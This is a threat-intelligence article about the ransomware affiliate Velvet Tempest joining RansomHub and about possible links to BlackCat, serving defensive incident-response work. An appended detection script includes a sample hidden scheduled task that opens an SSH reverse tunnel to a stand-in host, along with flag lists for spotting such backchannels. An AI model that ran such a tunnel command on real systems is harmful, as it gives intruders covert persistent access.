22 August 2024


A Tempest at RansomHub: Major new cyber threat group expands


S-RM identified a ransomware affiliate tracked as Velvet Tempest deploying ransomware with RansomHub, the latest indication that former BlackCat members are moving to the outfit, writes Tim Geschwindt.

In late June 2024, S-RM responded to a ransomware incident affecting a company’s infrastructure in Europe and Asia. The perpetrator was the ransomware affiliate tracked by Microsoft as Velvet Tempest (previously DEV-0504), whose new developments of the ExMatter data exfiltration tool we documented earlier this year.

The article in 30 seconds:

  • Velvet Tempest, a well-known threat actor, has followed other high-profile former BlackCat members and joined RansomHub, supporting the notion that RansomHub is a new major group in the ransomware ecosystem.
  • Some evidence suggests that RansomHub may be led by the administrators of BlackCat which, if true, would mean RansomHub’s administrators are untrustworthy and may steal ransom payments from their own members.
  • Eroding trust between cybercriminals is an important part of long-term disruption of the ecosystem.

Eye of the storm

We have been tracking Velvet Tempest across major cyber incidents since 2021, as they move between the most prolific ransomware-as-a-service (‘RaaS’) groups in the ecosystem (Figure 1). These ‘RaaS’ operations are typically well organised but decentralised; their members could be from anywhere in the world, but the administrators are often located in jurisdictions well out of reach of international law enforcement. The administrators rarely perpetrate attacks themselves and are instead responsible for coding the ransomware, and building and administering the leak sites, negotiation portals and cryptocurrency money laundering process. When a RaaS operation disbands, rebrands or is disrupted by law enforcement, Velvet Tempest moves to the next-best RaaS service.

S-RM - Velvet Tempest moves to RansomHub Graphics-Figure 1

Figure 1: Timeline of ransomware variants deployed by Velvet Tempest since 2020. Source: Microsoft, S-RM.

The latest such organisation is RansomHub. Since the first company was posted on their leak site on 10 February 2024, RansomHub has gone on to post 138 organisations in 171 days, a rate which makes them one of the most active groups in the ransomware ecosystem. However, due to the ‘iceberg effect’ (many incidents never surface publicly because the victim paid the ransom, or because the criminals lost the stolen data they intended to use as leverage), the actual number of companies impacted by RansomHub is likely to be around three times that figure.

Tempests, spiders and black cats

RansomHub’s appearance and rapid ramp-up in activity coincided with the implosion of a major RaaS group known as ALPHV (aka BlackCat), whose administrators ran an exit scam on their own members under the guise of a law enforcement takedown. Velvet Tempest was a long-time member of BlackCat, joining in late 2021, and is the latest in a string of high-profile former members to appear at RansomHub. Earlier this year the perpetrator of the February Change Healthcare breach and Scattered Spider, the group behind the Caesars Entertainment and MGM Resorts incidents in 2023, were both identified deploying RansomHub ransomware, suggesting they had both signed up to the new operation. The observation that at least three known entities (Velvet Tempest, Scattered Spider and the Change Healthcare perpetrator) have moved from BlackCat to RansomHub is not groundbreaking in itself: affiliates move to new services all the time, as Velvet Tempest’s history shows. However, the relationship between BlackCat and RansomHub may be more direct than a shared pool of affiliates.

S-RM - Velvet Tempest moves to RansomHub Graphics-Figure 2

Figure 2: The number of leaks on BlackCat and RansomHub's leak sites since October 2023. Source: ecrime.ch.

The number of postings on BlackCat and RansomHub’s leak sites since October 2023, shown above in Figure 2, tells its own story. Within weeks of setting up their infrastructure, and with little to no brand reputation, RansomHub had attracted enough members to establish themselves as one of the most active ransomware groups. This is unusual for a new group: it often takes months to convince members of the community that a new RaaS is secure and reliable, and that its administrators will not double-cross their affiliates and pocket the profit. RansomHub appear to have had no such issues, quickly attracting experienced affiliates from other high-profile operations and reaching a level of activity which makes them the second most active RaaS operation in the ecosystem after LockBit 3.0. The graph below shows how RansomHub’s output has continued to increase while other major groups have remained stagnant or posted fewer victims to their leak sites.

S-RM - Velvet Tempest moves to RansomHub Graphics-03

Figure 3: The number of victims posted to ransomware group leak sites since February 2024. (Note: we have excluded LockBit 3.0 leaks from this graph for legibility.) Source: ecrime.ch.

While this does suggest RansomHub has become one of the most significant RaaS operations and has attracted experienced cybercriminals who used to operate under the BlackCat brand, it does not definitively link RansomHub to the people behind BlackCat’s collapse. In a profile of the RansomHub group that S-RM will publish later in the year as part of our new Ransomware in Focus series, we will highlight how RansomHub’s operating model is designed to attract affiliates. Unlike most RaaS operations, in which the administrators take a 20 to 30 percent cut of any ransom an affiliate receives, RansomHub pays its members a 90 percent commission. And unlike BlackCat and many others, the administrators do not insist on receiving the payment themselves and then distributing it to their affiliates; instead the affiliate receives the ransom payment directly and forwards 10 percent to the administrators. This grants much greater control to the members and reduces the risk that affiliates are scammed by the administrators, which is exactly what happened at BlackCat.

A rebrand?

That, however, is where the overlap between the two groups ends. RansomHub was created at approximately the same time that BlackCat’s administrators shut down their infrastructure; it has grown to eclipse most other groups in the ransomware ecosystem; and it has attracted many of BlackCat’s high-profile affiliates, including N0tchy, members of the Scattered Spider threat group and now, as we have detailed here, Velvet Tempest. Beyond these points, the evidence of a direct link runs out.

S-RM - Velvet Tempest moves to RansomHub Graphics-Figure 4

Figure 4: The administrator of Cyclops and Knight ransomware selling its source code in February 2024. Source: KELA

RansomHub’s administrators appear to have purchased source code built by the threat actor behind Knight ransomware. Knight’s administrators put the ransomware up for sale to a single buyer in February 2024, which matches when RansomHub began deploying their payload. According to analysis by Symantec, RansomHub changed little from the original aside from adding a sleep command. Groups have historically been tracked through the code lineage of their encryptors, so buying someone else’s code is an effective way of severing that lineage. Similarly, we have not seen any shared use of IP addresses, ransom note formats or cryptocurrency wallets which might suggest further links between RansomHub and BlackCat.

Accusations from a rival

While we have found no definitive links between RansomHub and BlackCat, one of RansomHub’s rivals has suggested otherwise. LockBitSupp, the primary administrator of the rival ransomware group LockBit, whom US authorities identified as Dmitry Khoroshev in May 2024, claims that RansomHub is home not just to BlackCat’s former affiliates, but to their tarnished administrators too.

S-RM - Velvet Tempest moves to RansomHub Graphics-Figure 5

Figure 5: LockBitSupp's status on the private messaging service TOX, which translates to "RansomHub is a rebrand of BlackCat, be careful". Source: TOX

In late July 2024, LockBitSupp, posting on the TOX private messaging service where he maintains an active account, changed his status to “RansomHub is a rebrand of BlackCat, be careful”. The message serves as a warning to others in the ransomware ecosystem: BlackCat stole from their members, these are the same people, so do not join them.

Whether LockBitSupp’s claim is accurate is up for debate. In recent times his group has made several claims that turned out to be false, such as having breached the Federal Reserve Bank or Marvel. LockBitSupp also has a lot to gain from making the connection: by sowing discord and distrust about RansomHub he may prevent some of his most experienced members from leaving LockBit to join them. RaaS operations are competitive, and the chance to earn 90 percent of each ransom payment at RansomHub instead of the 70 percent they would receive at LockBit will entice some affiliates, while others may look at law enforcement’s infiltration of LockBit’s inner sanctum earlier in 2024, which resulted in the arrest of several affiliates, as a reason to look elsewhere.

Even treating any claim made by LockBitSupp with healthy suspicion, a rebrand does make sense for BlackCat’s administrators. One reason a RaaS like BlackCat might give up an established brand to start anew is to shed a tarnished reputation. BlackCat carefully built a reputation for reliability and trustworthiness before reportedly stealing USD 22 million from a long-term partner of the BlackCat RaaS known as “N0tchy”, and placing a fake law enforcement takedown notice on their website to disguise the theft. This exit scam irrevocably broke the trust between the BlackCat administrators and their members. Should the ecosystem begin to believe that the BlackCat administrators are the same individuals behind RansomHub, there may be a similar erosion of trust and the organisation may fracture.

Unfortunately, a definitive answer on the links between BlackCat and RansomHub is unlikely to surface soon. Whoever is behind RansomHub made no glaring operational security errors during their launch (no reuse of old cryptocurrency wallets, no recycling of old code in their encryptor, no reuse of old attack infrastructure, no negotiating from the same playbook) of the kind that would lead to quick answers about who they are. When a group avoids obvious operational security (OPSEC) errors like these, the question of their identity and their links to previous groups usually remains open until a law enforcement infiltration operation or an internal data leak later down the line gives the security community further insight.

So what?

The purpose of tracking threat actors like Velvet Tempest as they move between groups like BlackCat and RansomHub is two-fold. Firstly, threat actors thrive on anonymity. The possibility of identifying them reinforces the idea that their actions are traceable and that they are being closely watched. It is difficult to cause long-term disruption to ransomware groups whose administrators operate in jurisdictions out of reach of international law enforcement. As such, the cyber security community increasingly aims to understand how these cybercriminal communities operate and to find ways to erode the trust between individuals and groups.

Secondly, we track actors like Velvet Tempest to improve how we respond to cyber incidents. By understanding how these groups work, the links between them, and who is working under which brand, we can increase the effectiveness of our containment and recovery, forensics, and threat actor negotiation work. For example, knowing Velvet Tempest is involved in an incident enables us to hunt for the threat actor’s favourite persistence techniques: in Velvet Tempest’s case, a scheduled task which hides an SSH shell if the environment is well-protected, or an ExMatter trojan if it is not. Using cyber threat intelligence in this way reduces the risk of reinfection for our clients and accelerates recovery timelines.
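The scheduled-task persistence mentioned above is something a responder can hunt for directly in Task Scheduler's on-disk XML. The following script is an added example written for this page, not S-RM's tooling and not derived from any Velvet Tempest artefact: it parses task definitions (as stored under C:\Windows\System32\Tasks or exported with `schtasks /query /tn <name> /xml`) and flags any task whose action launches an SSH client, noting reverse-tunnel flags and the Hidden setting. The client binary names, the flag list and the two sample task definitions (including the 203.0.113.10 address) are constructed assumptions for illustration.

```python
"""Hunt Task Scheduler XML for an SSH backchannel registered as a scheduled task.

Added example, not S-RM's tooling. Task definitions live as UTF-16 XML under
C:\\Windows\\System32\\Tasks, or can be exported with
`schtasks /query /tn <name> /xml`. SSH_CLIENTS and TUNNEL_FLAGS are assumed
heuristics, not indicators taken from the article.
"""
import ntpath
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SSH_CLIENTS = {"ssh.exe", "ssh", "plink.exe", "plink"}  # assumption: clients worth flagging
TUNNEL_FLAGS = {"-R", "-N", "-D", "-W"}                  # assumption: reverse/forwarding flags


@dataclass
class Finding:
    task_name: str
    command: str
    arguments: str
    reasons: list[str] = field(default_factory=list)


def _basename(token: str) -> str:
    """Strip quotes and directories so C:\\...\\ssh.exe and "ssh.exe" compare equal."""
    return ntpath.basename(token.strip().strip('"')).lower()


def analyse_task(task_name: str, task_xml: str) -> list[Finding]:
    """Return one Finding per <Exec> action that launches an SSH client."""
    root = ET.fromstring(task_xml)
    hidden_text = root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS) or ""
    hidden = hidden_text.strip().lower() == "true"
    findings: list[Finding] = []
    for exec_node in root.findall("t:Actions/t:Exec", NS):
        command = (exec_node.findtext("t:Command", default="", namespaces=NS) or "").strip()
        arguments = (exec_node.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        tokens = arguments.split()
        # Catch a direct launch and a wrapped one such as "cmd.exe /c ssh.exe ..."
        if _basename(command) not in SSH_CLIENTS and not any(_basename(t) in SSH_CLIENTS for t in tokens):
            continue
        reasons = ["launches an SSH client"]
        flags = sorted(t for t in tokens if t in TUNNEL_FLAGS)
        if flags:
            reasons.append("tunnel/forwarding flags: " + " ".join(flags))
        if hidden:
            reasons.append("task is marked Hidden")
        findings.append(Finding(task_name, command, arguments, reasons))
    return findings


def scan_tasks_dir(tasks_dir: str) -> list[Finding]:
    """Walk a Tasks folder (live host or mounted image) and analyse every task file."""
    results: list[Finding] = []
    for path in Path(tasks_dir).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(encoding="utf-16")  # on-disk task files are UTF-16 with BOM
            results.extend(analyse_task(str(path.relative_to(tasks_dir)), text))
        except (UnicodeError, OSError, ET.ParseError):
            continue  # not a task definition; skip it
    return results


# Constructed sample task definitions (not real artefacts).
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec><Command>C:\Scripts\nightly-backup.cmd</Command></Exec>
  </Actions>
</Task>"""

SUSPECT_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\OpenSSH\ssh.exe</Command>
      <Arguments>-N -R 4444:127.0.0.1:3389 -i C:\ProgramData\k svc@203.0.113.10</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("Backup", BENIGN_TASK_XML), ("Updater", SUSPECT_TASK_XML)):
        for finding in analyse_task(name, xml_text):
            print(f"[!] {finding.task_name}: {finding.command} {finding.arguments}")
            for reason in finding.reasons:
                print(f"    - {reason}")
```

Run `scan_tasks_dir(r"C:\Windows\System32\Tasks")` on a live host, or point it at the same path inside a mounted image. A reverse tunnel (`-R`) combined with `-N` (no remote command) is the shape of a backchannel rather than an administrator's interactive session, and the Hidden setting is what keeps the task out of the Task Scheduler console; either alone is worth a look, both together warrant isolating the host before recovery proceeds.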

Written by Tim Geschwindt. Edited by Melissa DeOrio.

Please contact S-RM if you have any questions on this development or would like to discuss any aspect of cyber threat intelligence.
